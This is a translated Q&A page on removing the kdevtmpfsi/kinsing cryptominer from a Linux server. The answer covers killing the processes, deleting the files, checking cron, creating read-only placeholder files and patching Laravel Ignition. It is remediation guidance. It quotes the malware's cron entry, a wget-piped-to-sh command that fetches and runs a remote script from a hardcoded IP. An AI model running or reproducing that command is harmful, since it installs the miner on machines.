linux - kdevtmpfsi 使用整个 CPU
问题描述
我们正在使用 EC2(Ubuntu) 亚马逊实例来运行 Apache。最近我们注意到有一个进程使用了整个 CPU。
我们在以下过程的帮助下将其删除
[root@hadoop002 tmp]# systemctl status 25177
● session-5772.scope - Session 5772 of user root
Loaded: loaded (/run/systemd/system/session-5772.scope; static; vendor preset: disabled)
Drop-In: /run/systemd/system/session-5772.scope.d
└─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf
Active: active (abandoned) since Wed 2020-01-22 16:06:01 CST; 1h 21min ago
CGroup: /user.slice/user-0.slice/session-5772.scope
├─19331 /var/tmp/kinsing
└─25177 /tmp/kdevtmpfsi
Jan 22 16:06:17 hadoop002 crontab[19353]: (root) REPLACE (root)
Jan 22 16:06:17 hadoop002 crontab[19354]: (root) LIST (root)
Jan 22 16:06:17 hadoop002 crontab[19366]: (root) LIST (root)
Jan 22 16:06:17 hadoop002 crontab[19374]: (root) REPLACE (root)
Jan 22 16:06:17 hadoop002 crontab[19375]: (root) LIST (root)
Jan 22 16:06:17 hadoop002 crontab[19383]: (root) REPLACE (root)
Jan 22 16:06:17 hadoop002 crontab[19389]: (root) REPLACE (root)
Jan 22 16:06:17 hadoop002 crontab[19390]: (root) LIST (root)
Jan 22 16:06:17 hadoop002 crontab[19392]: (root) REPLACE (root)
Jan 22 16:06:17 hadoop002 crontab[19393]: (root) LIST (root)
[root@hadoop002 tmp]# ps -ef|grep kinsing
root 19331 1 0 16:06 ? 00:00:04 /var/tmp/kinsing
root 25190 23274 0 17:27 pts/0 00:00:00 grep --color=auto kinsing
[root@hadoop002 tmp]# ps -ef|grep kdevtmpfsi
root 25177 1 99 17:27 ? 00:01:47 /tmp/kdevtmpfsi
root 25197 23274 0 17:28 pts/0 00:00:00 grep --color=auto kdevtmpfsi
[root@hadoop002 tmp]# kill -9 19331
[root@hadoop002 tmp]# kill -9 25177
[root@hadoop002 tmp]# rm -rf kdevtmpfsi
[root@hadoop002 tmp]# cd /var/tmp/
[root@hadoop002 tmp]# ll
total 16692
-rw-r--r-- 1 root root 0 Jan 13 19:45 aliyun_assist_update.lock
-rwxr-xr-x 1 root root 13176 Dec 20 02:14 for
-rwxr-xr-x 1 root root 17072128 Jan 19 17:43 kinsing
drwx------ 3 root root 4096 Jan 13 19:50 systemd-private-f3342ea6023044bda27f0261d2582ea3-chronyd.service-O7aPIg
[root@hadoop002 tmp]# rm -rf kinsing
但几分钟后,它又自动启动了。有人知道怎么修这个东西吗?
解决方案
我在 Centos 8 中遇到了与 Laravel 相同的问题,这是我删除恶意软件并修补系统所遵循的步骤。
从系统步骤中删除恶意软件: 步骤 1:
删除恶意软件:使用或任何其他进程管理器
杀死这两个进程(kdevtmpfsi和kinsing-它们可以同名但末尾带有随机字符-) 。htop
htop F3 搜索服务 kdevtmpfsi 和 kinsing
使用以下命令查找和删除文件:
# find / -iname kdevtmpfsi* -exec rm -fv {} \;
# find / -iname kinsing* -exec rm -fv {} \;
输出应如下所示:
removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'
第2步:
检查 cron 作业:
检查是否有会重新初始化恶意软件的 cron 作业。
我在以下位置找到了我的:/var/spool/cron/apache >
UBUNTU /var/spool/cron/crontabs/www-data
它包括以下内容:
* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1
第 3 步:
制作新文件并将它们设为只读:
# touch /tmp/kdevtmpfsi && touch /tmp/kinsing
# echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
# echo "kinsing is fine now" > /tmp/kinsing
# chmod 0444 /tmp/kdevtmpfsi
# chmod 0444 /tmp/kinsing
修补 Laravel 项目: 第 1 步:
关闭 APP_DEBUG:
确保该APP_DEBUG属性false在,.env因为这是漏洞获取访问权限的方式。
第2步:
更新点火:
将点火
更新到更高的版本2.5.1,以确保修补漏洞。
在您的项目文件夹中运行以下命令:
$ composer update facade/ignition
推荐阅读
- json - 是否有可能在 Golang 中拥有动态键的结构以及 json 的静态键
- java - Android:如何在视图的可见性更改时触发事件?
- python - 函数返回值 if in DB else Continue
- python - 网页抓取时在循环中跳过错误
- javascript - Express.js 中的密码散列问题
- python - 浮点数的算术运算给出了意想不到的结果
- json - Jolt - 如何将两个数组转换为键值并保留其他单打属性
- json - 从 JSON 中删除空值和/或 null 值
- docker - NVIDIA cuda 启用 docker 容器问题 - 用户警告:CUDA 初始化:来自 cudaGetDeviceCount() 的意外错误
- json - 如何在 Android Studio 中有效地编辑 json 文件?